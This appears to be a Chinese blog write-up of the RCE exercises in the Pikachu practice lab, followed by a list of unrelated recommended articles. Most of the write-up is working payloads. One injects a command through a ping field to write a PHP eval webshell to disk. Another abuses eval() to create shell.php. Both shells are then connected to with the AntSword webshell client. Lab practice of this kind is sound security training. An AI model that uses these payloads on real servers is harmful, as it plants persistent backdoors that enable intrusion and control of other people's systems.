Pikachu靶场之RCE漏洞详解

一.exec "ping"

1.ping本机127.0.0.1

2.用&符拼接dir查看目录

3.&拼接echo输入一句话木马

127.0.0.1&echo "<?php @eval($_POST[cmd]);?>)" > 6.php

4.同级目录访问6.php,蚁剑连接

二:exec "eval"

1.后台使用了eval()函数,直接输入phpinfo();

2.写入一句话木马,访问shell.php

fputs(fopen('shell.php','w'),'<?php eval($_POST["cmd"])?>');

3.蚁剑连接

相关推荐
xian_wwq4 小时前
【学习笔记】攻击链贯穿端边云!边缘网络访问三大核心风险预警
笔记·学习·安全·边缘计算
老赵聊算法、大模型备案5 小时前
北京市生成式人工智能服务已备案信息公告(2025年12月11日)
人工智能·算法·安全·aigc
鸠摩智首席音效师6 小时前
linux 系统中 Shutting Down, Restarting, Halting 有什么区别 ?
linux·运维·服务器
CIb0la6 小时前
Linux 将继续不支持 HDMI 2.1 实现
linux·运维·服务器
吕了了6 小时前
85 微PE吕了了修改版--更新!
运维·windows·电脑·系统
鹿鸣天涯7 小时前
Kali Linux 2025.4 发布:桌面环境增强,新增 3 款安全工具
linux·运维·安全
峥嵘life8 小时前
Android16 EDLA 认证测试CTS问题分析解决
android·java·服务器
学习&笔记8 小时前
MTK(系统篇)user版本无法使用setenforce 0命令关闭selinux权限
linux·运维·服务器
Bdygsl8 小时前
Linux(8)—— 进程优先级与环境变量
linux·运维·服务器
吕了了8 小时前
87 Windows 系统安装的本质是什么?
运维·windows·电脑·系统